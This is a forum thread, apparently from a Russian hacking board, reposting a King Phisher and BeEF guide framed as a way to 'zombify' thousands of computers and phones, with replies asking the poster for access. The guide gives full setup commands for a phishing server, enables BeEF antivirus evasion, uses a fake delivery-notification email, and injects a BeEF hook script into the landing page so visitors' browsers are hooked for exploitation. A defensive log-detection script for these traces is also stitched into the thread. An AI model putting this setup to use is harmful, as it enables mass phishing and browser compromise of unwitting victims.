Building a super mega cool machine for zombifying computers and phones (Part 1)

ins1der

If you dig into it, you'll see that this is simply genius!
The instructions are in English; personally I barely know English, but I understood everything perfectly.
It describes how to build something like a botnet that spams itself, using:
KingPhisher + BeEF
I will open the hide, but not for everyone.
The information is provided for informational purposes only!
The thread author and the hhide.su administration bear no responsibility for any damage you cause.
Using this method, thousands of devices can be infected in a couple of days.
Be careful with this, Department K never sleeps)


Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:
  • The pain of spinning up infrastructure for the campaign
  • Tracking user participation and response
  • The reconfiguration efforts required each time a new set of individuals is targeted

king-phisher takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.

Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on Digital Ocean as a 24/7 service is needed for a proper phishing campaign, and Digital Ocean offers a solid product at the right price. Not necessary, you can host it yourself of course.

To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.

Prerequisites

  • A box running Ubuntu 14.10 x64 (this probably works on Debian and a range of other distros, but no guarantees)
  • A standard user configured (via adduser)
  • Remotely accessible SSH server running
Configuring the king-phisher server
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:
Code:
    root@deceptor:~# apt-get install postgresql  python-mpltoolkits.basemap python-mpltoolkits.basemap-data
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    The following extra packages will be installed:
    postgresql-9.4 postgresql-client-9.4 postgresql-client-common postgresql-common ssl-cert
    …
    * Starting PostgreSQL 9.4 database server                                                                                     [OK ]
    Setting up postgresql (9.4+162) …
    root@deceptor:~#
    root@deceptor:~# cd /opt && wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
    Linux version detected as Ubuntu
    Downloading and installing the King Phisher server to /opt/king-phisher
    Successfully cloned the git repo
    Installing Ubuntu dependencies
    …
    root@deceptor:/opt#
This will pull the latest version of king-phisher from SecureState’s GitHub repository, download all the dependencies and install king-phisher in the /opt directory. Go grab some coffee, as there are a number of packages for the installer to pull and configure. It took around 10 minutes.

If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:
Code:
    root@deceptor:~# apt-get remove python-pip
    …
    …
    root@deceptor:~# easy_install pip
    Searching for pip
    Reading https://pypi.python.org/simple/pip/
    …
    …
    Finished processing dependencies for pip
    root@deceptor:~#
…then rerun setup.sh to finish installing the server.

Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:
Code:
    host    "king_phisher"  "king_phisher"  127.0.0.1/32            md5
..then configure the Postgresql user account for king_phisher:
Code:
    root@deceptor:~# su postgres
    postgres@deceptor:~# createuser king_phisher -P
    Enter password for new role: :<yourpassword>
    Enter it again: :<yourpassword>
    postgres@deceptor:~# createdb --owner=king_phisher king_phisher
    postgres@deceptor:~# exit
    root@deceptor:~#
If during the creation you are asked any questions about the role of the king_phisher user, just answer “n” to all of them. Once this is done, you’ll need to update the king-phisher server configuration to use your newly-created Postgresql database by editing /opt/king-phisher/server_config.yml. Comment out the following line:
Code:
database: sqlite:////var/king-phisher/king-phisher.db
..then add the following:
Code:
    database: postgresql://king_phisher:<yourpassword>@localhost/king_phisher
Make sure your indenting is accurate, then restart the Postgresql server. Test to make sure KingPhisherServer starts correctly:
Code:
root@deceptor:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
INFO     listening on 0.0.0.0:80
INFO     0.0.0.0:80 – basic authentication has been enabled
INFO     0.0.0.0:80 – serving files has been enabled
INFO     initializing database connection with driver postgresql
INFO     the job manager has been started
WARNING  the specified geoip database does not exist, downloading a new copy
INFO     Starting new HTTP connection (1): geolite.maxmind.com
INFO     server running in process: 22826 main tid: 0x7ffbb4525740
INFO     dropped privileges to the nobody account
Ok, the king-phisher server is now sorted. Ctrl+C to kill it for now, as it’s time to install BeEF into the /opt directory and configure its dependencies:
Code:
    root@deceptor:/opt# git clone https://github.com/beefproject/beef.git
    Cloning into ‘beef’…
    remote: Counting objects: 24769, done.
    remote: Total 24769 (delta 0), reused 0 (delta 0), pack-reused 24769
    Receiving objects: 100% (24769/24769), 9.69 MiB | 3.73 MiB/s, done.
    Resolving deltas: 100% (12811/12811), done.
    Checking connectivity… done.
    root@deceptor:/opt/beef# apt-get install ruby-all-dev libsqlite3-dev sqlite3
    …
    root@deceptor:/opt# gem install rvm
    …
    root@deceptor:/opt# gem install bundler
    …
    root@deceptor:/opt# cd beef
    …
    root@deceptor:/opt/beef# ./beef
    Could not find gem ‘eventmachine (>= 0) ruby’ in any of the gem sources listed in your Gemfile or available on this machine.
    Run `bundle install` to install missing gems.
    root@deceptor:/opt/beef# bundle install
    …
    root@deceptor:/opt/beef#
Edit /opt/beef/config.yaml and change the server port to 443:
Code:
    # HTTP server
        http:
            debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
            host: "0.0.0.0"
            port: "443"
…then enable antivirus evasion:
Code:
     evasion:
                enable: true
You should also DEFINITELY change the admin password for BeEF – this is also configurable in /opt/beef/config.yaml. You should now be able to run BeEF:
Code:
    root@deceptor:/opt/beef# ./beef
    [ 6:45:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
    [ 6:45:34][*] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha
    [ 6:45:34]    |   Twit: @beefproject
    [ 6:45:34]    |   Site: http://beefproject.com
    [ 6:45:34]    |   Blog: http://blog.beefproject.com
    [ 6:45:34]    |_  Wiki: https://github.com/beefproject/beef/wiki
    [ 6:45:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
    [ 6:45:34][*] BeEF is loading. Wait a few seconds…
    [ 6:45:39][*] 13 extensions enabled.
    [ 6:45:39][*] 240 modules enabled.
    [ 6:45:39][*] 3 network interfaces were detected.
    [ 6:45:39][+] running on network interface: 127.0.0.1
    [ 6:45:39]    |   Hook URL: http://127.0.0.1:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://127.0.0.1:443/ui/panel
    [ 6:45:39][+] running on network interface: 1.2.3.4
    [ 6:45:39]    |   Hook URL: http://1.2.3.4:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://1.2.3.4:443/ui/panel
    [ 6:45:39][+] running on network interface: 2.3.4.5
    [ 6:45:39]    |   Hook URL: http://12.3.4.5:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://2.3.4.5:443/ui/panel
    [ 6:45:39][*] RESTful API key: 3cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx8e
    [ 6:45:39][*] DNS Server: 127.0.0.1:5300 (udp)
    [ 6:45:39]    |   Upstream Server: 8.8.8.8:53 (udp)
    [ 6:45:39]    |_  Upstream Server: 8.8.8.8:53 (tcp)
    [ 6:45:39][*] HTTP Proxy: http://127.0.0.1:6789
    [ 6:45:39][*] BeEF server started (press control+c to stop)
Righto, now we need to configure our mail transport agent. I won’t be using the king-phisher version, not because it’s not great, but just because so I’ll configure postfix instead. Swap out myname@mydomain for an appropriate value:
Code:
    root@deceptor:/opt/beef# apt-get install mailutils postfix
    …
Select Internet Site and pick an appropriate FQDN value. Then sort out the rest of the config:
Code:
    root@deceptor:/opt/beef# echo "root myname@mydomain" > /etc/postfix/generic
    root@deceptor:/opt/beef# postmap /etc/postfix/generic
Add an entry to smtp_generic_maps and change the inet_interfaces value to 127.0.0.1 in /etc/postfix/main.cf:
Code:
    inet_interfaces = 127.0.0.1
    smtp_generic_maps = hash:/etc/postfix/generic
Restart postfix. Done.
Configuring the KingPhisher client
Configuring the client is pretty straightforward – see the king-phisher install page for a list of known supported platforms/OS. I’ll be using Kali 1.0.8 to run the client. The easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:
Code:
    root@kali:~# apt-get install libgeos++-dev libgeos-3.3.3 libgeos-dev python-mpltoolkits.basemap python-mpltoolkits.basemap-data
    Reading package lists… Done
    Building dependency tree 
    Reading state information… Done
    …
    …
    root@kali:~#
    root@kali:~# wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
    Linux version detected as Kali
    Downloading and installing the King Phisher server to /opt/king-phisher
    …
    …
    Start the King Phisher server with the following command:
    sudo /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
    root@kali:~#
Now you should be able to run the gui client by navigating to /opt/king-phisher and running ./KingPhisher:
bb01.jpg

Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.

Let’s use the “fake delivery notification” template by setting the Message HTML file to
/opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.

The document root for KingPhisher’s webserver is specified in the last line /opt/king-phisher/server_config.yaml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:

Code:
    root@deceptor:~# ln -s /opt/king-phisher/data/server/king_phisher/education/* /var/www

We will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.

Now we should have everything we need to run the campaign:

bb02.jpg

The following fields are the most critical:

Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.

In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.

SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:

– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box

Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.

Integrating BeEF hooks
Before we send this one off, we should configure the BeEF hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like http://1.2.3.4:443/hook.js). Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.

You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit /var/www/index.html and add the following after the <head> tag:
Code:
<script src="/kp.js"></script>
Great, now they will be BeEF-hooked when they visit.

Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, then off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.

I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.

Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:

– Enabling SSL/TLS
– Capturing credentials
 
Last edited:
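
Seen from the defending side, the setup in the post above leaves recognisable traces in web-proxy logs: cleartext HTTP sent to TCP port 443, and requests for /hook.js, /ui/panel and /kp.js. The following detection sketch is an added example, not part of the original post; the log format, the function names and the sample lines are constructed assumptions.

```python
"""Flag proxy-log entries matching the traits of the setup described above.

Added example: the log format and the sample lines are constructed.
"""
from urllib.parse import urlsplit

# Paths taken from the post: BeEF hook and UI panel, King Phisher's kp.js.
SUSPECT_PATHS = {"/hook.js": "beef-hook-path", "/ui/panel": "beef-ui-path",
                 "/kp.js": "king-phisher-js"}

def classify(url):
    """Return a sorted list of reasons why a requested URL is suspicious."""
    parts = urlsplit(url)
    reasons = set()
    try:
        port = parts.port
    except ValueError:          # malformed port in the logged URL
        return ["malformed-port"]
    # Cleartext HTTP aimed at the HTTPS port, as in http://1.2.3.4:443/hook.js
    if parts.scheme == "http" and port == 443:
        reasons.add("http-on-443")
    path = parts.path.lower()
    for suffix, tag in SUSPECT_PATHS.items():
        if path.endswith(suffix):
            reasons.add(tag)
    return sorted(reasons)

def scan(lines):
    """Yield (client_ip, url, reasons) for each flagged log line.

    Assumed format (hypothetical): '<timestamp> <client_ip> <method> <url> <status>'
    """
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue            # skip lines that do not match the assumed format
        _, client, _, url, _ = fields
        reasons = classify(url)
        if reasons:
            yield client, url, reasons

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
2017-06-01T09:14:02Z 10.0.0.21 GET http://192.0.2.10/index.html 200
2017-06-01T09:14:03Z 10.0.0.21 GET http://192.0.2.10/kp.js 200
2017-06-01T09:14:03Z 10.0.0.21 GET http://192.0.2.10:443/hook.js 200
2017-06-01T09:15:40Z 10.0.0.35 GET https://intranet.example/app.js 200
""".splitlines()

if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(client, url, ",".join(reasons))
```

The path matches alone are weak signals (a file named kp.js or hook.js can be benign); the combination with cleartext HTTP on port 443 from the same client is the stronger indicator.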

WhiteHacker

Hmm, if it's so genius and not everyone will get it, maybe you could lower the hide?
 

Areot

How about translating it into Russian?
 

WhiteHacker

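If you run it through a translator, it will come out as complete nonsense; it's better to read it in English as it is and work through it
Everything is intuitive
That's what I wanted to do myself anyway, I haven't been studying English for 5 years for nothing)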
 

Mqtreek

Yeah, the hide is high, I guess you'll lower it again someday
 

wazls

Can't I get a personal one? I've just got some time to read
 

Mr.Green

I'm curious too, but better not lower the hide =)))
 

illusion_Life

>I will open the hide, but not for everyone.
Will you open it?
 

Likantrop

Will you grant me a personal one, or am I not of royal blood?
 